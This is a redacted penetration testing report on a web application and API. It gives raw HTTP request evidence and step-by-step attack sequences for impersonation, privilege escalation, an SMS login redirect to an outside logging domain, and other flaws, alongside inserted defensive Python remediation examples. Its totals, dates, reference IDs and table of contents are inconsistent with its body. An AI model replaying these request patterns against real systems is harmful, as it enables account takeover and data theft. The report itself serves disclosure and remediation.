Penetration Testing Report
March 14th, 2022
Prepared by:
Email:
Telephone: xxxxxxxx
Table of Contents
Executive Summary
    Assessment Summary
    Strategic Recommendations
1 Technical Summary
    1.1 Scope
    1.2 Post Assessment Clean-up
    1.3 Risk Ratings
    1.4 Findings Overview
2 Technical Details
    2.1 User Impersonation - Improper Access Control
    2.2 Data Exfiltration - Improper Access Control
    2.3 Privilege escalation
    2.4 Unvalidated Redirect
    2.5 Exposure of Data to an Unauthorized Control Sphere
    2.6 URL Redirection to Untrusted Site (‘Open Redirect’)
    2.7 Cross-Site Request Forgery (CSRF)
    2.8 Unrestricted Upload of File with Dangerous Type
    2.9 Security Misconfiguration - Replay Attack
    2.10 Missing Brute Force Protection
    2.11 Missing ‘Strict-Transport-Security’ header
    2.12 Overly Permissive Cross-domain Whitelist
    2.13 Missing Error Handling Leads to Information Exposure
    2.14 Frameable response (Clickjacking)
Document Control
Client Confidentiality
This document contains Client Confidential information and may not be copied without written permission.
Proprietary Information
The content of this document is considered proprietary information and should not be disclosed outside of the
recipient organization’s network.
PenTest-Hub gives permission to copy this report for the purposes of disseminating information within your
organization or any regulatory agency.
Document Version Control
Issue No.   Issue Date   Issued By   Change Description
0.1         18/01/2018               Draft for internal review only
1.0         23/01/2018               Released to client
Executive Summary
This report details the scope of the testing conducted and all significant findings, along with detailed
remedial advice. The summary below gives a non-technical audience an overview of the key findings; section
two of this report relates each finding in detail, with the technical details of every vulnerability discovered
during the assessment and tailored best practices for fixing it.
Assessment Summary
Based on the security assessment of the web applications, the current status of the identified vulnerabilities
sets the overall risk at a CRITICAL level. If not addressed in time (strongly recommended before going into a live
production environment), these vulnerabilities could be the trigger for a cybersecurity breach. They can be
fixed easily by following the best practices and recommendations given throughout the report.
The following table lists the in-scope items of the penetration test and breaks down the issues identified,
classified by risk severity (note that this summary table does not include the informational items):
Phase   Description                   Critical   High   Medium   Low   Total
1       Web/API Penetration Testing   4          5      4        1     14
        Total                         3          5      5        1     14
The graph below summarises the total number of vulnerabilities found up until the issuing of this report:
[Bar chart "Vulnerabilities" by severity: Critical 4, High 5, Medium 4, Low 1]
Strategic Recommendations
We recommend addressing the CRITICAL and HIGH vulnerabilities before go-live.
1 Technical Summary
1.1 Scope
The security assessment was carried out in the pre-production environment and it included the following scope:
o [IP: ]
o [IP: ]
o [IP: ]
o [IP: ]
o [IP: ]
o [IP: ]
1.2 Post Assessment Clean-up
Any test accounts, which were created for the purpose of this assessment, should be disabled or removed, as
appropriate, together with any associated content.
1.3 Risk Ratings
The table below gives a key to the risk naming and colours used throughout this report to provide a clear and
concise risk scoring system.
It should be noted that quantifying the overall business risk posed by any of the issues found in any test is
outside our scope. This means that some risks may be reported as high from a technical perspective but may,
as a result of other controls unknown to us, be considered acceptable by the business.
#   Risk Rating   CVSSv3 Score   Description
1   CRITICAL      9.0 - 10       A vulnerability was discovered that has been rated as critical. This requires resolution as quickly as possible.
2   HIGH          7.0 - 8.9      A vulnerability was discovered that has been rated as high. This requires resolution in the short term.
3   MEDIUM        4.0 - 6.9      A vulnerability was discovered that has been rated as medium. This should be resolved throughout the ongoing maintenance process.
4   LOW           1.0 - 3.9      A vulnerability was discovered that has been rated as low. This should be addressed as part of routine maintenance tasks.
5   INFO          0 - 0.9        A discovery was made that is reported for information. This should be addressed in order to meet leading practice.
1.4 Findings Overview
All the issues identified during the assessment are listed below with a brief description and risk rating for each
issue. The risk ratings used in this report are defined in the Risk Ratings section.
Ref Description Risk
######-1-1 User Impersonation - Improper Access Control CRITICAL
######-1-2 Data exfiltration - Improper Access Control CRITICAL
######-1-3 Privilege escalation CRITICAL
######-1-4 Unvalidated Redirect CRITICAL
######-1-5 Exposure of Data to an Unauthorized Control Sphere HIGH
######-1-6 URL Redirection to Untrusted Site ('Open Redirect’) HIGH
######-1-7 Cross-Site Request Forgery (CSRF) HIGH
######-1-8 Unrestricted Upload of File with Dangerous Type HIGH
######-1-9 Security Misconfiguration – Replay Attack HIGH
######-1-10 Missing Brute Force Protection MEDIUM
######-1-11 Missing 'Strict-Transport-Security' header MEDIUM
######-1-12 Overly Permissive Cross-domain Whitelist MEDIUM
######-1-13 Missing Error Handling Leads to Information Exposure MEDIUM
######-1-14 Frameable response (Clickjacking) LOW
2 Technical Details
2.1 User Impersonation - Improper Access Control CRITICAL
Ref ID: -1-1
It has been discovered that, through a specially crafted request, a malicious user can reserve a in the name
of any other user present in the system. This is potentially dangerous because of the possible legal implications
when a genuine user is framed for fraudulent usage of the account.
Vulnerability Details:
Affects: https://
Parameter(s) userId
Attack Vectors Authorization bearer, all post parameters
References: https://cwe.mitre.org/data/definitions/284.html
Evidence
POST /apps/v1/local-exchange-processes HTTP/1.1
Host:
Accept: application/json, text/plain, */*
content-type: application/json
Authorization: Bearer eyJhbGciOiJSUzI1NiIsImtpZCI6IjUyRDJCOEIwMTJFM0I1NTM0RkU4MEI4OEM4OU
Connection: close
{
"intendedExternalReceiverFirstName": " r",
"intendedExternalReceiverLastName": " ",
"intendedExternalRecieverEmail": " ",
}
Evidence:
HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/8.0
X-Powered-By: ASP.NET
Set-Cookie:
ARRAffinity=abe18183e77faf1e87f82aa4578c0ed58f288a8204c71035817c6810452761b5;Path=/;HttpOnly;Domain=
Connection: close
{"compartmentId":" ”}
A successful attack would consist of the following:
1. A malicious user creates an account.
2. Alters the above highlighted POST data.
3. Submits the request using a valid Bearer.
Remediation Guidance:
Validate all accessible inputs and protect such assets through the implemented authorization system.
2.2 Data Exfiltration – Improper Access Control CRITICAL
Ref ID: -1-2
Our engineers have discovered that a valid can be retrieved for any of the users present in the system
without any restrictions. Once this is obtained, an attacker can generate the QR code and open
of any user from the system.
Vulnerability Details:
Affects: https://
Parameter(s) userId
Attack Vectors userId from any user from the system (this can be obtained using the search
functionality)
References: https://cwe.mitre.org/data/definitions/284.html
Evidence
Raw HTTP request used to retrieve the page.
POST /api/users/3E38C1DB-1C19-4631-8A76-48A1719A0EE0/personalcode HTTP/1.1
Host: #
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
content-type: application/json
Content-Length: 243
Connection: close
{}
Raw HTTP response used as the page basis.
HTTP/1.1 200 OK
Content-Length: 461
Content-Type: application/json; charset=utf-8
Vary: Accept-Encoding
X-Powered-By: ASP.NET
Set-Cookie:
ARRAffinity=abe18183e77faf1e87f82aa4578c0ed58f288a8204c71035817c6810452761b5;Path=/;HttpOnly;Domain=
Connection: close
A successful attack would consist of the following:
1. A malicious user creates an account.
2. Retrieves the user identifier of any user (the system easily allows this through the user search functionality).
3. Within the above example request, the attacker swaps the original uid with the uid of the targeted user.
4. Deletes the authorization bearer token and issues the altered request.
Remediation Guidance:
Validate all accessible inputs and protect such assets through the implemented authorization system.
2.3 Privilege escalation CRITICAL
Ref ID: -1-3
Our engineers have discovered that altering the “id”, “email” or “phone” values leads to privilege escalation. A
malicious user can easily create an account and send a valid PUT request with an altered payload in the body
section. Once these values are updated, the attacker only has to use the updated phone number on the login
screen in order to successfully access the victim’s account.
Vulnerability Details:
Affects: https://
Parameter(s) Id, email, phone
Attack Vectors Values of another user
References: https://cwe.mitre.org/data/definitions/284.html
Evidence
Raw HTTP request used to retrieve the page:
PUT /api/users/3E38C1DB-1C19-4631-8A76-48A1719A0EE0 HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dCI6IkRCN3UtSkRLbjRqcW5falZ2YzBGTlotaHl0cyIsIm
Connection: close
{
"id": "ADED9C73-70E1-451C-A605-B4DDBC3C3D2B",
"firstName": " ",
"lastName": "L ",
"email": " ",
"phone": " ",
"gender": "Male",
"birthDate": "1983-12-01",
"language": "en-us"
}
Raw HTTP response used as the page basis.
HTTP/1.1 200 OK
Content-Length: 461
Content-Type: application/json; charset=utf-8
Access-Control-Allow-Origin: *
Set-Cookie:
ARRAffinity=abe18183e77faf1e87f82aa4578c0ed58f288a8204c71035817c6810452761b5;Path=/;HttpOnly;Domain=
Connection: close
{"email":" ","avatar":null,"birthDate":"1983-12-01","gender":"Male","language":"en-us","isRegistrationCompleted":true,"isPrivacyStatementApproved":true,"key":"04A132D8-058E-4E0C-9A8A-A74BB6CDC048","boxActionCount":0,"tagKey":null,"passUri":"api/passbook/v1/passes /61a24603-561c-4ca8-bea9-eff0808ad10","id":"ADED9C73-70E1-451C-A605-B4DDBC3C3D2B","firstName":" i","lastName":" ","phone":" "}
Remediation Guidance:
Validate all accessible inputs, ensure user role matrix is protected throughout all functionalities.
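Findings 2.1, 2.2 and 2.3 share one root cause: the server acts on a user identifier supplied by the client (in the POST body, in the URL path, or in the PUT payload) instead of deriving it from the authenticated caller. The sketch below is an added example, not code from the assessed application (which, judging by the response headers, runs on ASP.NET/IIS); it is written in framework-neutral Python, and the bearer-token parsing is a stand-in for an already-verified JWT. The admin role name and the list of writable profile fields are assumptions made for the example.

```python
"""Object-level authorization for user-scoped API calls.

Added example (not the assessed application's code): a framework-neutral model
of the fix for findings 2.1, 2.2 and 2.3. Token handling is simplified: the
value after 'Bearer ' stands in for the subject of an already-verified JWT,
optionally followed by ';role1,role2' (assumption made for the example).
"""
from dataclasses import dataclass, field

ADMIN_ROLE = "admin"  # assumption: name of the role allowed to act on other users

# Fields a user may change on their own profile. "id", "email" and "phone" are
# deliberately absent: they are identity-bearing and need a separate, verified
# flow (assumption for the example, matching the remediation for 2.3).
PROFILE_WRITABLE = frozenset({"firstName", "lastName", "gender", "birthDate", "language"})


class Unauthorized(Exception):
    """No usable credential: maps to HTTP 401."""


class Forbidden(Exception):
    """Credential present but not allowed for this target: maps to HTTP 403."""


@dataclass(frozen=True)
class Principal:
    subject: str
    roles: frozenset = field(default_factory=frozenset)


def principal_from_headers(headers: dict) -> Principal:
    """Require a bearer token and derive the caller identity from it.
    Real code verifies the JWT signature and expiry here; the example treats
    the token as the already-verified subject."""
    scheme, _, token = headers.get("Authorization", "").partition(" ")
    if scheme != "Bearer" or not token:
        raise Unauthorized("bearer token required")
    subject, _, roles = token.partition(";")
    return Principal(subject, frozenset(r for r in roles.split(",") if r))


def authorize_user_scope(caller: Principal, target_user_id: str) -> None:
    """A caller may only act on their own user id unless they hold ADMIN_ROLE."""
    if caller.subject != target_user_id and ADMIN_ROLE not in caller.roles:
        raise Forbidden("cannot act on behalf of another user")


def create_exchange(headers: dict, body: dict) -> dict:
    """2.1: the userId in the POST body is checked against the caller, never trusted."""
    caller = principal_from_headers(headers)
    authorize_user_scope(caller, body.get("userId", ""))
    return {"ownerId": caller.subject, "status": "created"}


def get_personal_code(headers: dict, path_user_id: str) -> dict:
    """2.2: the user id in the path must match the token subject; no token, no code."""
    caller = principal_from_headers(headers)
    authorize_user_scope(caller, path_user_id)
    return {"userId": path_user_id, "code": "<issued-to-owner-only>"}


def update_profile(headers: dict, path_user_id: str, body: dict, store: dict) -> dict:
    """2.3: only allow-listed fields are copied from the body. id, email, phone and
    any unknown keys are reported back as ignored instead of being applied."""
    caller = principal_from_headers(headers)
    authorize_user_scope(caller, path_user_id)
    profile = store.setdefault(path_user_id, {"id": path_user_id})
    ignored = sorted(k for k in body if k not in PROFILE_WRITABLE)
    for key in sorted(body.keys() & PROFILE_WRITABLE):
        profile[key] = body[key]
    return {"profile": profile, "ignoredFields": ignored}
```

The points to carry over into the real code base: every user-scoped endpoint resolves the caller from the token and compares it with the target id before doing any work; a missing token is a 401 rather than a pass-through (the 2.2 request succeeded with the bearer removed); a mismatch is a 403; and the generic profile PUT copies only allow-listed fields, so identity-bearing values cannot be rewritten through it.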
2.4 Unvalidated Redirect CRITICAL
Ref ID: -1-3
Due to an unvalidated redirect, a malicious user can craft a payload so that the login request message is sent to
a valid/targeted user and then redirected to a malicious domain, where these requests (including the URL
payload) are logged; with this, the attacker can gain access to the targeted user’s account. The example below
shows how a malicious domain can be injected into the SMS that is sent to the user.
Vulnerability Details:
Affects: https://
References: https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.md
Request:
POST /login/sms HTTP/1.1
Content-Type: application/json; charset=UTF-8
Content-Length: 94
Host:
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.10.0
{"onMobilePlatform":true,"phone":" 8","redirectUrl":"https://pentest-hub.com/"}
Evidence:
Remediation Guidance:
All input should be correctly validated and redirects should be carefully treated.
2.5 Exposure of Data to an Unauthorized Control Sphere HIGH
Ref ID: -1-4
While updating the user’s profile we discovered an exposed path within the user’s profile response body.
Vulnerability Details:
Affects: /api/passbook/v1/passes/ /1
Parameter(s) passUri
Attack Vectors Accessing the exposed passUri
References: https://cwe.mitre.org/data/definitions/497.html
Evidence
Raw HTTP response.
HTTP/1.1 200 OK
Content-Length: 453
Content-Type: application/json; charset=utf-8
Set-Cookie: ARRAffinity=59a86da1609d266452159b8b78ea71406bf8c6b71d5a956fc8a8ec97f56363e6;Path=/;HttpOnly
Connection: close
{"email":"[email protected]"api/passbook/v1/passes/ /61a24603-561c-4ca8-bea9-eff0808ad104","id":"ADED9C73-70E1-451C-A605-B4DDBC3C3D2B","firstName":" i","lastName":" ","phone":" "}
Step 2 of exploitation:
Using the passUri value in a new request:
Raw HTTP request
GET /api/passbook/v1/passes/ /1 HTTP/1.1
Accept: application/json, text/plain, */*
Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dCI6IkRCN3UtSk
Connection: close
Raw HTTP response.
HTTP/1.1 500 Internal Server Error
Content-Length: 134
Set-Cookie: ARRAffinity=59a86da1609d266452159b8b78ea71406bf8c6b71d5a956fc8a8ec97f56363e6;Path=/;HttpOnly
Connection: close
{"message":"Certificate for Apple iOS passbook: D:\\home\\site\\wwwroot\\Certificates\\ PassCertificate.p12"}
NOTE: This error exposed interesting information. It is understood that the test environment was not properly
configured to fully use all assets, so, to validate this vulnerability, the next step was to replay the same request
while changing the host to production. The result fully exposed the p12 certificate.
Remediation Guidance:
1. Create custom error messages that don’t expose sensitive information.
2. Make sure there are no sensitive files exposed through the presentation layer.
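As an added illustration of remediation point 1 (this is example code, not the application's), the handler below returns a fixed message and a correlation id to the client and writes the real exception text only to the server log; a second function scans an outgoing body for file paths and certificate file names so that a message like the one above is caught before it leaves the server. The sensitive-detail pattern is an assumption to be tuned to the platform, and the exception text used in the test is constructed, not taken from a live system.

```python
"""Generic error responses with server-side detail, plus a response filter.

Added example, not the assessed application's code. It illustrates remediation
point 1: the client receives a fixed message and a correlation id, while the
real exception text (which in the finding above contained a certificate path)
is written only to the server log. The sample exception message used in the
test is constructed and does not come from a live system.
"""
import logging
import re
import uuid

log = logging.getLogger("api.errors")

# Details that must never appear in a client-facing body (assumption: tune to the
# platform). Covers Windows drive paths, common Unix roots, certificate bundles
# and secret-like words.
SENSITIVE = re.compile(
    r"[A-Za-z]:\\|/home/|/var/|/etc/|\.p12\b|\.pfx\b|\.pem\b|password|secret",
    re.IGNORECASE,
)


def safe_error_response(exc: Exception, status: int = 500) -> dict:
    """Body to return for an unhandled exception. The correlation id lets support
    find the logged detail without the client ever seeing it."""
    correlation_id = uuid.uuid4().hex
    log.error("request failed id=%s type=%s detail=%r",
              correlation_id, type(exc).__name__, str(exc))
    return {"status": status,
            "message": "An internal error occurred.",
            "correlationId": correlation_id}


def leaks_sensitive_detail(body: dict) -> bool:
    """Last-line check for an outgoing JSON body (usable in a response filter or in
    tests): True when a path, certificate file name or secret-like word is present."""
    return SENSITIVE.search(str(body)) is not None


def handle_request(action, *args) -> dict:
    """Run a handler and convert any exception into a safe body. Assumes the
    handler returns a dict on success."""
    try:
        return action(*args)
    except Exception as exc:  # deliberately broad: this is the outer boundary
        return safe_error_response(exc)
```

The filter is a backstop, not the fix: the fix is that exception text never reaches the serialiser in the first place. Keeping the correlation id in both the log line and the response is what makes the generic message workable for support staff.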
2.6 URL Redirection to Untrusted Site (‘Open Redirect’) HIGH
Ref ID: -1-5
URL redirectors represent common functionality employed by web sites to forward an incoming request to an
alternate resource. This can be done for a variety of reasons and is often done to allow resources to be moved
within the directory structure and to avoid breaking functionality for users that request the resource at its
previous location. URL redirectors may also be used to implement load balancing, leveraging abbreviated URLs
or recording outgoing links. It is this last implementation which is often used in phishing attacks as described in
the example below.
Vulnerability Details:
Affects: https:// ?SPHostUrl=https://
Parameter(s) SPHostUrl
Attack Vectors https://www.pentest-hub.com
References: http://projects.webappsec.org/URL-Redirector-Abuse
Evidence
GET / / ?=https%3A%2F%2Fblue-sea-697d.quartiers047.workers.dev%3A443%2Fhttps%2Fwww.pentest-
hub.com?ProductNumber=16.0.6823.1206&UserID=i%3A0%2A.f%7Cmembership%7Csl% ?&selectedItemID=%7C3&sel
ectedListID=%7B919D5894-A969-4A55-9A81-7C27D69D49DF%7D HTTP/1.1
Host:
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
Raw HTTP response.
HTTP/1.1 307 Temporary Redirect
Location: https://www.pentest-hub.com/?https:// /sites/context%3fcontextKey%3d08ec9fd1-a5d0-45af-9633-a86779734549
NOTE: The above URL is only an example which shows the discovered vulnerability. The vulnerability is actually
present in multiple areas of the application. To fully remediate the vulnerable parameter, consider applying the
proposed fix to all instances where the parameter is present.
Remediation Guidance:
Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a whitelist of
acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to
specifications, or transform it into something that does. Do not rely exclusively on looking for malicious or
malformed inputs (i.e., do not rely on a blacklist). However, blacklists can be useful for detecting potential
attacks or determining which inputs are so malformed that they should be rejected outright.
2.7 Cross-Site Request Forgery (CSRF) HIGH
Ref ID: -1-6
The web application does not, or cannot, sufficiently verify whether a well-formed, valid, consistent request
was intentionally provided by the user who submitted the request.
When a web server is designed to receive a request from a client without any mechanism for verifying that it
was intentionally sent, then it might be possible for an attacker to trick a client into making an unintentional
request to the web server which will be treated as an authentic request. This can be done via a URL, image
load, XMLHttpRequest, etc. and can result in exposure of data or unintended code execution.
Vulnerability Details:
Affects: https://
Parameter(s) Missing or incomplete implementation of CSRF protection (token)
Attack Vectors CSRF related
References: https://cwe.mitre.org/data/definitions/284.html
Evidence
The result of a successful exploit is that a new topic is inserted and present within the dashboard. See below:
NOTE: The above is only an example which shows the discovered vulnerability. The vulnerability is actually
present in multiple areas of the application.
Remediation Guidance:
Based on the risk of whether the form submission performs a sensitive action, the addition of anti-CSRF tokens
may be required.
These tokens can be configured in such a way that each session generates a new anti-CSRF token or such that
each individual request requires a new token.
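Both variants mentioned in the remediation, a token per session and a fresh token per request, are shown below as an added example (not the application's code; the server secret and the in-memory token store are constructed for the example, and a deployment would load the secret from configuration and share the store across instances).

```python
"""Anti-CSRF synchronizer tokens in the two forms the remediation mentions:
one token per session, or a fresh single-use token per request.

Added example, not the assessed application's code. The server secret and the
in-memory token store are constructed for the example; a deployment would load
the secret from configuration and share the store across instances.
"""
import hashlib
import hmac
import secrets

SERVER_SECRET = secrets.token_bytes(32)  # constructed for the example


def session_csrf_token(session_id: str) -> str:
    """Per-session token: an HMAC of the session id under a server secret, so it
    needs no storage and stays constant for the life of the session."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def verify_session_csrf(session_id: str, submitted) -> bool:
    """Constant-time comparison; a missing token compares as the empty string."""
    return hmac.compare_digest(session_csrf_token(session_id), submitted or "")


class PerRequestTokens:
    """Per-request tokens: each form render issues a random token bound to the
    session, and a token is accepted exactly once."""

    def __init__(self):
        self._issued = {}  # session id -> set of outstanding tokens

    def issue(self, session_id: str) -> str:
        token = secrets.token_urlsafe(32)
        self._issued.setdefault(session_id, set()).add(token)
        return token

    def consume(self, session_id: str, submitted) -> bool:
        outstanding = self._issued.get(session_id, set())
        match = next((t for t in outstanding
                      if hmac.compare_digest(t, submitted or "")), None)
        if match is None:
            return False
        outstanding.discard(match)  # single use: a replayed token is refused
        return True


def handle_state_changing_post(session_id: str, form: dict,
                               tokens: PerRequestTokens, per_request: bool) -> int:
    """Check the token before performing the action. Returns an HTTP status:
    403 when the CSRF check fails, 200 when the action may proceed."""
    submitted = form.get("csrf_token")
    if per_request:
        ok = tokens.consume(session_id, submitted)
    else:
        ok = verify_session_csrf(session_id, submitted)
    return 200 if ok else 403
```

The token travels in the form body or a custom request header, never only in a cookie (a cookie is sent automatically, which is exactly what CSRF exploits), and the check runs before the action, on every state-changing endpoint; the report notes the issue is present in multiple areas. The per-session form is cheaper and works with multiple open tabs; the per-request form also limits the damage of a token that leaks.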
2.8 Unrestricted Upload of File with Dangerous Type HIGH
Ref ID: -1-7
The software allows the attacker to upload or transfer files of dangerous types that can be automatically
processed within the product's environment.
Vulnerability Details:
Affects: https://
Parameter(s) Upload functionality
Attack Vectors Malicious file upload
References: https://www.owasp.org/index.php/Unrestricted_File_Upload
https://cwe.mitre.org/data/definitions/434.html
Evidence
In order to reproduce the vulnerability, wherever the upload functionality is implemented, try uploading
“out-of-context” files or even files that contain malicious payloads (malware).
In the example shown below, we have successfully uploaded malware embedded into a PDF file. For further
testing/validation purposes we will share the same file as part of this report (it contains a harmless dummy
malware payload that is used only to discover such vulnerabilities).
Remediation Guidance:
Do not rely exclusively on looking for malicious or malformed inputs (i.e., do not rely on a blacklist). A blacklist
is likely to miss at least one undesirable input, especially if the code's environment changes. This can give
attackers enough room to bypass the intended validation. However, blacklists can be useful for detecting
potential attacks or determining which inputs are so malformed that they should be rejected outright.
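The "accept known good" alternative to a blacklist is shown below as an added example (not the application's code): the final extension must be on an allow-list, the leading bytes must match that type, the size is bounded and the stored name is chosen by the server. The accepted types, size limit and upload directory are assumptions, and the sample files in the test are constructed byte strings. The deny-list function is kept only for contrast.

```python
"""Allow-list validation for uploaded files: the extension and the file content
must both match an accepted type, and the stored name is server-generated.

Added example, not the assessed application's code. The accepted types, size
limit and upload directory are assumptions; the sample files in the test are
constructed byte strings, not real documents.
"""
import os
import secrets

MAX_BYTES = 10 * 1024 * 1024  # assumption

# Allow-list: final extension -> accepted leading bytes (magic numbers).
ALLOWED_TYPES = {
    ".pdf": (b"%PDF-",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
}

UPLOAD_DIR = "/srv/uploads"  # assumption: outside the web root, never executed or served raw


class UploadRejected(ValueError):
    pass


def validate_upload(filename: str, data: bytes) -> str:
    """Return the extension the file will be stored under, or raise UploadRejected."""
    if not data or len(data) > MAX_BYTES:
        raise UploadRejected("empty or oversized file")
    # Only the final extension counts, so 'shell.pdf.exe' is judged as '.exe'.
    base = os.path.basename(filename.replace("\\", "/"))
    ext = os.path.splitext(base)[1].lower()
    if ext not in ALLOWED_TYPES:
        raise UploadRejected(f"type not allowed: {ext or '(none)'}")
    if not any(data.startswith(magic) for magic in ALLOWED_TYPES[ext]):
        raise UploadRejected("content does not match the declared type")
    return ext


def stored_path(ext: str) -> str:
    """Random server-chosen name: the client's file name never reaches the disk."""
    return os.path.join(UPLOAD_DIR, secrets.token_hex(16) + ext)


def accept_upload(filename: str, data: bytes) -> str:
    """Validate and return the path the bytes should be written to."""
    return stored_path(validate_upload(filename, data))


def deny_list_check(filename: str) -> bool:
    """The approach the report advises against, kept for contrast: a deny-list
    misses 'report.phtml', 'x.PhP5', and anything the environment adds later."""
    return not filename.lower().endswith((".exe", ".php", ".js"))
```

One caveat the finding itself illustrates: a PDF with an embedded payload is still a well-formed PDF, so type validation alone does not catch it. That needs malware scanning of the stored file, and serving downloads with Content-Disposition: attachment from a location that is never interpreted by the application server.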
2.9 Security Misconfiguration – Replay Attack HIGH
Ref ID: -1-8
Due to the “replay attack” vulnerability, a malicious user can iterate through the auto-generated access code
values by brute force in order to gain access to a user’s account.
Vulnerability Details:
Affects: https:// /connect/token
Parameter(s) code
Attack Vectors Randomly generated
References: https://www.owasp.org/index.php/Top_10_2013-A5-Security_Misconfiguration
Evidence
Raw HTTP request used to retrieve the page.
POST /ids/connect/token HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https:// .com/authentication/register/account-verify;emailOrPhone=
Origin: https:// .com
Connection: close
client_id=wap&client_secret=no_secret&grant_type=custom&scope=email%20offline_access%20openid%20profile%20roles%20api.general&code=287316
Raw HTTP response.
HTTP/1.1 200 OK
Remediation Guidance:
Within any of the app’s functionality, the requests should be protected in such way that replay attacks are not
possible. The solution for this would be the usage of a unique token for every request.
2.10 Missing Brute Force Protection MEDIUM
Ref ID: -1-9
Our tests have discovered that the software does not implement sufficient measures to prevent multiple failed
authentication attempts within a short time frame, making it more susceptible to brute force attacks. This was
discovered within the upload functionality accessible through the invite that can be shared by email.
The risk rating in this particular case is medium, as the functionality only serves for uploading and the invite
link is random enough to be considered secure. However, the risk is still present, as the invite link does not
have an expiration time set and it is transported through the URL, which in some cases can be easily picked up,
and it is also saved in browser history, analytics systems and elsewhere.
Vulnerability Details:
Affects: https:// /
References: https://cwe.mitre.org/data/definitions/307.html
https://www.owasp.org/index.php/Blocking_Brute_Force_Attacks
Evidence
Remediation Guidance:
We recommend implementing a CAPTCHA system to limit the risk carried by possible brute force attacks
against the platform.
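Findings 2.9 and 2.10 are two sides of the same control: a verification code must be usable once and for a limited time (so a captured /connect/token request cannot be replayed), and the number of wrong guesses must be bounded (so a six-digit code cannot be iterated through). The store below is an added example, not the application's code, and complements the CAPTCHA recommended above; the lifetime, attempt and lockout limits are assumptions, and the clock is injectable so expiry and lockout can be exercised in a test.

```python
"""Single-use, expiring verification codes with attempt limiting.

Added example, not the assessed application's code. It addresses finding 2.9
(an access code that can be iterated through or replayed) and finding 2.10
(no limit on failed attempts), complementing the CAPTCHA the report
recommends. Lifetime, attempt and lockout limits are assumptions.
"""
import hashlib
import hmac
import secrets
import time

CODE_TTL_SECONDS = 300    # assumption: a code is valid for five minutes
MAX_ATTEMPTS = 5          # assumption: wrong guesses allowed per issued code
LOCKOUT_SECONDS = 900     # assumption: identifier is locked after MAX_ATTEMPTS


class CodeStore:
    """Issue and verify one-time codes keyed by an identifier (phone or e-mail).
    The clock is injectable so expiry and lockout can be tested deterministically."""

    def __init__(self, clock=time.time):
        self._clock = clock
        self._codes = {}   # identifier -> [sha256(code), expires_at, failed_attempts]
        self._locked = {}  # identifier -> locked_until

    @staticmethod
    def _digest(code: str) -> str:
        # Stored hashed so a leaked store does not hand out live codes.
        return hashlib.sha256(code.encode()).hexdigest()

    def issue(self, identifier: str) -> str:
        """Generate a fresh 6-digit code; re-issuing replaces the previous one."""
        code = f"{secrets.randbelow(1_000_000):06d}"
        self._codes[identifier] = [self._digest(code), self._clock() + CODE_TTL_SECONDS, 0]
        return code

    def verify(self, identifier: str, submitted) -> str:
        """Returns 'ok', 'invalid', 'expired' or 'locked'. A correct code is consumed
        on first use, so the same request cannot be replayed; too many wrong
        guesses discard the code and lock the identifier."""
        now = self._clock()
        if self._locked.get(identifier, 0) > now:
            return "locked"
        entry = self._codes.get(identifier)
        if entry is None:
            return "invalid"
        digest, expires_at, failed = entry
        if now > expires_at:
            del self._codes[identifier]
            return "expired"
        if hmac.compare_digest(digest, self._digest(submitted or "")):
            del self._codes[identifier]
            return "ok"
        entry[2] = failed + 1
        if entry[2] >= MAX_ATTEMPTS:
            del self._codes[identifier]
            self._locked[identifier] = now + LOCKOUT_SECONDS
            return "locked"
        return "invalid"
```

With these limits an attacker gets at most five guesses per issued code against a space of a million values, and a code that has been used once is gone, which is what the "unique token for every request" remediation in 2.9 asks for. A per-source-address rate limit in front of the endpoint is a useful second layer, since the lockout above is per identifier.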